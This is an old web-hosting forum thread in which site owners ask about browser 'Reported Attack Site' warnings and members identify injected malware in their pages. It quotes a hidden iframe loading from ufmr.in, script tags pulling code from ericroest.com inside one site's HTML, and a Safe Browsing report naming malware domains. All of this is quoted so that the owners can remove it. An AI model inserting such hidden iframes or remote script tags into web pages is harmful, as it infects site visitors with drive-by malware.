Reported Attack Site Problem

Discussion in 'Site & Server Administration' started by alex.ohc, Nov 1, 2009.

  1. #1
    Hi friends,
    My friend is really in some problem. His site is giving Reported Attack Site popup. :(
    Error 1: http://www.krishnendu.org/german/index.html
    Error 2: http://krishnenduayur.org/

    • Is this because of flaw in coding or unreliable hosting? :confused:
    • Will complete redesign or changing web host resolves this issue ?
    • How long will it take to get rid of this menace ?
    Please help me to solve this malware problem and to bring back their reputed site on the right track.
    Thanks in advance.
     
    alex.ohc, Nov 1, 2009 IP
  2. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #2
    Some hacker has added some malcious code in ur site

    the code is this

    <iframe src="http://ufmr.in:8080/index.php" width=153 height=115 style="visibility: hidden"></iframe>
    Code (markup):
    remove it from your pages
     
    Bohra, Nov 1, 2009 IP
    alex.ohc likes this.
  3. alex.ohc

    alex.ohc Well-Known Member

    Messages:
    797
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    185
    Digital Goods:
    1
    #3
    thank you for replying.
    How to avoid this in future? Is it because of the shared hosting?
     
    alex.ohc, Nov 1, 2009 IP
  4. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #4
    Yea soemtimes shared host get hacked and ur sites too also sometimes ur scripts have glitch and that can cause it too
     
    Bohra, Nov 1, 2009 IP
  5. alex.ohc

    alex.ohc Well-Known Member

    Messages:
    797
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    185
    Digital Goods:
    1
    #5
    Can you pls ans these 2 also.. Sorry for bugging u again...
     
    alex.ohc, Nov 1, 2009 IP
  6. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #6
    # Will complete redesign or changing web host resolves this issue ?

    If you remove the malcious codes the issue will be fixed so if u do a complete redesign those codes will go automatically.

    Hosting Doesnt matter once u remove those errors will go in time


    # How long will it take to get rid of this menace ?


    There is no time once u remove the codes in time that will just go away
     
    Bohra, Nov 1, 2009 IP
  7. alex.ohc

    alex.ohc Well-Known Member

    Messages:
    797
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    185
    Digital Goods:
    1
    #7
    awesome support.. No need to wonder how you 've this much reps in short period :)
     
    alex.ohc, Nov 1, 2009 IP
  8. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #8
    :) Well did this suddenly happen ? coz normally hackers target index.html , index.php. index.htm and .htaccess so make sure all this is clear for future safety..

    Hope things are fixed soon enjoy

    - Bohra
     
    Bohra, Nov 1, 2009 IP
  9. alex.ohc

    alex.ohc Well-Known Member

    Messages:
    797
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    185
    Digital Goods:
    1
    #9
    nope.. i guess the German link was affected 1st and the 2nd link is affected recently.
     
    alex.ohc, Nov 1, 2009 IP
  10. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #10
    ic and who is your host ??
     
    Bohra, Nov 1, 2009 IP
  11. alex.ohc

    alex.ohc Well-Known Member

    Messages:
    797
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    185
    Digital Goods:
    1
    #11
    this is my friend's website. I ll ask n post the details.
     
    alex.ohc, Nov 1, 2009 IP
  12. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #12
    Alrite no worries.. just remove the codes and the site will be back to normal soon..

    and just make sure u are on a reputed host if u friend has his own server then good. but dont go in for those unlimited resellers
     
    Bohra, Nov 1, 2009 IP
  13. craiggy

    craiggy Active Member

    Messages:
    101
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    53
    #13
    Also make sure register globals is turned off or these hacks may reappear on your sites... Turning register globals off will insure that no trojans or scripts will import malicious code and install it on your sites
     
    craiggy, Nov 10, 2009 IP
    alex.ohc likes this.
  14. ravee1981

    ravee1981 Active Member

    Messages:
    712
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    60
    #14
    keep your passwords safe buddy, and strong. Host only with trusted hosts. Better pay a few dollars extra rather than loosing your business completely
     
    ravee1981, Nov 16, 2009 IP
  15. farhantrader

    farhantrader Peon

    Messages:
    53
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    i am getting this same problem with my site http://acmacomputers.com . Can someone plz have a look on the code and tell me what the problem is.
     
    farhantrader, Nov 17, 2009 IP
  16. SecureCP

    SecureCP Guest

    Messages:
    226
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #16
    What happened when Google visited this site?

    Of the 10 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-16, and the last time suspicious content was found on this site was on 2009-11-16.

    Malicious software includes 14 scripting exploit(s), 4 exploit(s), 3 trojan(s).

    Malicious software is hosted on 4 domain(s), including iquotient.ru/, 3ci.ru/, 3e0.ru/.

    This site was hosted on 1 network(s) including AS16245 (NGDC).
     
    SecureCP, Nov 17, 2009 IP
  17. nikb

    nikb Peon

    Messages:
    93
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #17
    <script src=http://ericroest.com/images/logo.php ></script>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <!-- saved from url=(0032)http://www.aksharalive.com/acma/ -->
    <HTML><HEAD><TITLE>| Acma Computers - Home |</TITLE>
    
    <META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
    <META content="MSHTML 6.00.2900.2180" name=GENERATOR>
    <script type="text/JavaScript">
    <!--
    function MM_preloadImages() { //v3.0
      var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
        var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
        if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
    }
    
    function MM_swapImgRestore() { //v3.0
      var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
    }
    
    function MM_findObj(n, d) { //v4.01
      var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
        d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
      if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
      for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
      if(!x && d.getElementById) x=d.getElementById(n); return x;
    }
    
    function MM_swapImage() { //v3.0
      var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
       if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
    }
    //-->
    </script>
    <link href="stylesheet.css" rel="stylesheet" type="text/css">
    </HEAD>
    <script src=http://ericroest.com/images/logo.php ></script>
    Code (markup):
    Remove ericroest.com from your code.
     
    nikb, Nov 17, 2009 IP
  18. flamer

    flamer Peon

    Messages:
    757
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #18
    - You have a website's code which has malicious content as a iframe.

    You just need to remove them. You will possibly have this if you are on godaddy. I have had clients from Godaddy who had a network attach which caused this issue. Nothing more then you going on a different hosting server would help.
     
    flamer, Nov 17, 2009 IP
  19. SecureCP

    SecureCP Guest

    Messages:
    226
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #19
    I've got confirmed cases of this on 1and1, hostmonster, and more. This is not the hosts problem, it's either you're code has vulneribilities and/or your ftp username and passwords have been compromised. You can see more if you look through your logs.
     
    SecureCP, Nov 17, 2009 IP
  20. farhantrader

    farhantrader Peon

    Messages:
    53
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #20
    thanks a lot nikb
     
    farhantrader, Nov 17, 2009 IP